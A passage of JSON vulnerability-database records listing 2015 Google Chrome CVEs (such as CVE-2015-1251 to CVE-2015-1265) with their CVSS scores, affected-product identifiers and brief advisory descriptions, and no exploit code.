"AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263", "CVE-2015-1288"], "modified": "2015-07-23T00:59:00", "id": "DEBIANCVE:CVE-2015-1288", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1288", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-12-03T14:33:14", "description": "PDFium, as used in Google Chrome before 43.0.2357.65, does not properly initialize memory, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1259", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1259"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1259", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1259", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:16", "description": "android/java/src/org/chromium/chrome/browser/WebsiteSettingsPopup.java in Google Chrome before 43.0.2357.65 on Android does not properly restrict use of a URL's fragment identifier during construction of a page-info popup, which allows remote attackers to spoof the URL bar or deliver misleading popup content via crafted text.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1261", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1261"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.107"], "id": "CVE-2015-1261", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1261", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:42.0.2311.107:*:*:*:*:android:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:14", "description": "Use-after-free vulnerability in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document that leverages improper handling of a shadow tree for a use element.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1256", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1256"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1256", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1256", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:13", "description": "Google Chrome before 43.0.2357.65 relies on libvpx code that was not built with an appropriate --size-limit value, which allows remote attackers to trigger a negative value for a size field, and consequently cause a denial of service or possibly have unspecified other impact, via a crafted frame size in VP9 video data.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1258", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1258", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1258", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:15", "description": "Cross-site scripting (XSS) vulnerability in Google Chrome before 43.0.2357.65 allows user-assisted remote attackers to inject arbitrary web script or HTML via crafted data that is improperly handled by the Bookmarks feature.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1264", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1264"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1264", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1264", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:16", "description": "platform/fonts/shaping/HarfBuzzShaper.cpp in Blink, as used in Google Chrome before 43.0.2357.65, does not initialize a certain width field, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted Unicode text.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1262", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1262"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1262", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1262", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:19", "description": "platform/graphics/filters/FEColorMatrix.cpp in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, does not properly handle an insufficient number of values in an feColorMatrix filter, which allows remote attackers to cause a denial of service (container overflow) or possibly have unspecified other impact via a crafted document.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1257", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1257"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1257", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1257", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:13", "description": "Use-after-free vulnerability in content/renderer/media/webaudio_capturer_source.cc in the WebAudio implementation in Google Chrome before 43.0.2357.65 allows remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact by leveraging improper handling of a stop action for an audio track.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1255", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1255"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1255", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1255", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:12", "description": "core/dom/Document.cpp in Blink, as used in Google Chrome before 43.0.2357.65, enables the inheritance of the designMode attribute, which allows remote attackers to bypass the Same Origin Policy by leveraging the availability of editing.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1254", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1254"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1254", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1254", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:11", "description": "Use-after-free vulnerability in the SpeechRecognitionClient implementation in the Speech subsystem in Google Chrome before 43.0.2357.65 allows remote attackers to execute arbitrary code via a crafted document.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1251", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1251", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1251", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:17", "description": "Multiple unspecified vulnerabilities in Google Chrome before 43.0.2357.65 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1265", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1265"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1265", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1265", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:11", "description": "core/html/parser/HTMLConstructionSite.cpp in the DOM implementation in Blink, as used in Google Chrome before 43.0.2357.65, allows remote attackers to bypass the Same Origin Policy via crafted JavaScript code that appends a child to a SCRIPT element, related to the insert and executeReparentTask functions.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1253", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1253"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1253", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1253", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:16", "description": "The Spellcheck API implementation in Google Chrome before 43.0.2357.65 does not use an HTTPS session for downloading a Hunspell dictionary, which allows man-in-the-middle attackers to deliver incorrect spelling suggestions or possibly have unspecified other impact via a crafted file.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1263", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1263", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1263", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:18", "description": "Multiple use-after-free vulnerabilities in content/renderer/media/user_media_client_impl.cc in the WebRTC implementation in Google Chrome before 43.0.2357.65 allow remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code that executes upon completion of a getUserMedia request.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1260", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1260"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1260", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1260", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:33:11", "description": "common/partial_circular_buffer.cc in Google Chrome before 43.0.2357.65 does not properly handle wraps, which allows remote attackers to bypass a sandbox protection mechanism or cause a denial of service (out-of-bounds write) via vectors that trigger a write operation with a large amount of data, related to the PartialCircularBuffer::Write and PartialCircularBuffer::DoWrite functions.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1252", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1252"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1252", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1252", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-05T14:10:56", "description": "The Spellcheck API implementation in Google Chrome before 44.0.2403.89 does not use an HTTPS session for downloading a Hunspell dictionary, which allows man-in-the-middle attackers to deliver incorrect spelling suggestions or possibly have unspecified other impact via a crafted file, a related issue to CVE-2015-1263.", "cvss3": {}, "published": "2015-07-23T00:59:00", "type": "cve", "title": "CVE-2015-1288", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263", "CVE-2015-1288"], "modified": "2023-11-07T02:24:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:google:chrome:43.0.2357.134", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.7z"], "id": "CVE-2015-1288", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1288", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.7z:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:43.0.2357.134:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*"]}], "prion": [{"lastseen": "2023-11-22T03:45:42", "description": "android/java/src/org/chromium/chrome/browser/WebsiteSettingsPopup.java in Google Chrome before 43.0.2357.65 on Android does not properly restrict use of a URL's fragment identifier during construction of a page-info popup, which allows remote attackers to spoof the URL bar or deliver misleading popup content via crafted text.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1261"], "modified": "2017-01-03T02:59:00", "id": "PRION:CVE-2015-1261", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1261", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-22T03:45:41", "description": "platform/graphics/filters/FEColorMatrix.cpp in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, does not properly handle an insufficient number of values in an feColorMatrix filter, which allows remote attackers to cause a denial of service (container overflow) or possibly have unspecified other impact via a crafted document.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Buffer overflow", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1257"], "modified": "2017-01-03T02:59:00", "id": "PRION:CVE-2015-1257", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1257", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:45:41", "description": "Use-after-free vulnerability in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document that leverages improper handling of a shadow tree for a use element.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1256"], "modified": "2017-01-03T02:59:00", "id": "PRION:CVE-2015-1256", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1256", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:45:43", "description": "Google Chrome before 43.0.2357.65 relies on libvpx code that was not built with an appropriate --size-limit value, which allows remote attackers to trigger a negative value for a size field, and consequently cause a denial of service or possibly have unspecified other impact, via a crafted frame size in VP9 video data.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2017-01-03T02:59:00", "id": "PRION:CVE-2015-1258", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1258", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:45:41", "description": "core/html/parser/HTMLConstructionSite.cpp in the DOM implementation in Blink, as used in Google Chrome before 